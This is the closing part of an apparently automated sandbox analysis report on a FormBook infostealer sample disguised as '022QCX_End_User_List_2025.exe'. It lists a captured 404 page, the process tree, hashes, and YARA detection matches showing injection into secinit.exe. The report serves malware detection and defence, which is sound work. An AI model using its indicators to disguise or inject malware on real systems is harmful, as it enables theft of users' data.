                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 [TRUNCATED]
                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Le fichier requis n'a pas &eacute;t&eacute; trouv&eacute;.Il peut s'agir d'une erreur technique. Veuillez r&eacute;essayer ult&eacute;rieurement. Si vous ne pouvez pas acc&eacute;der au fichier apr&egrave;s plusieurs tentatives, cela signifie qu'il a &eacute;t&eacute; supprim&eacute;. </p> </body></html>


                                                                                                    Statistics

                                                                                                    CPU Usage

                                                                                                    Click to jump to process

                                                                                                    Memory Usage

                                                                                                    Click to jump to process

                                                                                                    High Level Behavior Distribution

                                                                                                    Click to dive into process behavior distribution

                                                                                                    Behavior

                                                                                                    Click to jump to process

                                                                                                    System Behavior

                                                                                                    General

                                                                                                    Target ID:0
                                                                                                    Start time:01:50:56
                                                                                                    Start date:22/01/2025
                                                                                                    Path:C:\Users\user\Desktop\022QCX_End_User_List_2025.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Users\user\Desktop\022QCX_End_User_List_2025.exe"
                                                                                                    Imagebase:0xa70000
                                                                                                    File size:803'328 bytes
                                                                                                    MD5 hash:E8B4E24D64B7847A824FD0926101E7B7
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:low
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:2
                                                                                                    Start time:01:51:02
                                                                                                    Start date:22/01/2025
                                                                                                    Path:C:\Users\user\Desktop\022QCX_End_User_List_2025.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Users\user\Desktop\022QCX_End_User_List_2025.exe"
                                                                                                    Imagebase:0x6f0000
                                                                                                    File size:803'328 bytes
                                                                                                    MD5 hash:E8B4E24D64B7847A824FD0926101E7B7
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2063942175.00000000011F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2058828430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2066777958.0000000001FC0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                    Reputation:low
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:6
                                                                                                    Start time:01:51:26
                                                                                                    Start date:22/01/2025
                                                                                                    Path:C:\Program Files (x86)\gZJRpugesoYeKrsuoIXKLHeCTGfyMTDmIiIKcCRFgXloGdtRXAsTegkh\gJe493hPOgj2OnF5.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Program Files (x86)\gZJRpugesoYeKrsuoIXKLHeCTGfyMTDmIiIKcCRFgXloGdtRXAsTegkh\ID1pPz1dHhy4.exe"
                                                                                                    Imagebase:0x6e0000
                                                                                                    File size:143'872 bytes
                                                                                                    MD5 hash:9C98D1A23EFAF1B156A130CEA7D2EE3A
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2940387871.0000000003480000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                    Reputation:moderate
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:7
                                                                                                    Start time:01:51:28
                                                                                                    Start date:22/01/2025
                                                                                                    Path:C:\Windows\SysWOW64\secinit.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Windows\SysWOW64\secinit.exe"
                                                                                                    Imagebase:0xa10000
                                                                                                    File size:9'728 bytes
                                                                                                    MD5 hash:3B4B8DB765C75B8024A208AE6915223C
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2938382440.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2940757113.0000000003670000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2940659392.0000000003620000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    Reputation:moderate
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:8
                                                                                                    Start time:01:51:42
                                                                                                    Start date:22/01/2025
                                                                                                    Path:C:\Program Files (x86)\gZJRpugesoYeKrsuoIXKLHeCTGfyMTDmIiIKcCRFgXloGdtRXAsTegkh\gJe493hPOgj2OnF5.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Program Files (x86)\gZJRpugesoYeKrsuoIXKLHeCTGfyMTDmIiIKcCRFgXloGdtRXAsTegkh\no8ML3OTX6fe.exe"
                                                                                                    Imagebase:0x6e0000
                                                                                                    File size:143'872 bytes
                                                                                                    MD5 hash:9C98D1A23EFAF1B156A130CEA7D2EE3A
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2942300801.0000000005680000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                    Reputation:moderate
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:9
                                                                                                    Start time:01:51:55
                                                                                                    Start date:22/01/2025
                                                                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                    Imagebase:0x7ff6bf500000
                                                                                                    File size:676'768 bytes
                                                                                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Disassembly

                                                                                                    Reset < >